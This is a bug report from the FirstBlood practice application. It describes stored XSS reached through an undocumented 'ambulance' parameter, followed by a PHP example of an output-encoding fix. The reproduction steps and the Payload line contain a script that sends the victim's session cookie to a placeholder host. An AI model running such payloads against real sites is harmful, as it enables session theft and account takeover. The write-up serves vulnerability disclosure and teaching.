FirstBlood #1298: Enable Ambulance Service for the Appointment leading to Stored XSS
This issue was discovered on FirstBlood v3

On 2022-12-09, mr_xhunt (Level 8) reported:


I have found that while creating the Appointment, adding the ambulance parameter with value 1 enables the Ambulance service for us, and adding the XSS payload in the fname gets us Stored XSS on /api/ambulances.php.

Steps to Reproduce:

  1. You need to create an Appointment and intercept the request in Burp Suite.
  2. Add a new parameter ambulance with value 1.
  3. Now add the payload in the fname parameter: hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>
  4. Now go to the following endpoint and enter the appointment guid:
  5. On visiting the page you will get an alert box popup.
  6. Using the payload given will leak the cookie and can be used for ATO.


The fname parameter values must be sanitized before writing them into the source.

P2 High

Endpoint: /api/ba.php & /api/ambulances.php

Parameter: ambulance & fname

Payload: 1 & hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>

FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the user's first/last name. For this to work, the parameter ambulance=1 must be set.
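As an added example (not code from the FirstBlood application), the PHP fragment below contrasts the unsafe concatenation the report describes with HTML-encoding the stored name for the attribute context it lands in; the function names and the input template are assumptions, and the test value is the report's own payload.

```php
<?php
// Added example, not FirstBlood's code. The template and function names are
// assumptions; the stored value reaches the page through a markup attribute.

// Vulnerable pattern: the stored fname is concatenated straight into markup,
// so a value containing "> closes the attribute and the tag and injects HTML.
function renderNameUnsafe(string $fname): string {
    return '<input name="fname" value="' . $fname . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES escapes both " and ', so the value can never leave the attribute;
// < and > become &lt; and &gt;, so no element can be injected.
function renderNameSafe(string $fname): string {
    $safe = htmlspecialchars($fname, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input name="fname" value="' . $safe . '">';
}

// True when the rendered fragment contains no raw tag or attribute delimiter
// outside the template itself (a cheap regression check, not a parser).
function isNeutralized(string $html, string $template): bool {
    $rest = str_replace($template, '', $html);
    return strpbrk($rest, '<>"\'') === false;
}

// Constructed check using the payload from the report.
$payload  = 'hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>';
$template = '<input name="fname" value="';

$unsafe = renderNameUnsafe($payload);
$safe   = renderNameSafe($payload);

echo "unsafe neutralized: " . var_export(isNeutralized($unsafe, $template), true) . "\n"; // false
echo "safe neutralized:   " . var_export(isNeutralized($safe, $template), true) . "\n";   // true
echo $safe . "\n";
// <input name="fname" value="hello&quot;&gt;&lt;script&gt;...&lt;/script/x&gt;">
```

Encoding at the output sink is the fix that covers every stored value, including names entered before the report; rejecting the undocumented ambulance parameter on the appointment request, rather than silently honouring it, is a separate hardening step.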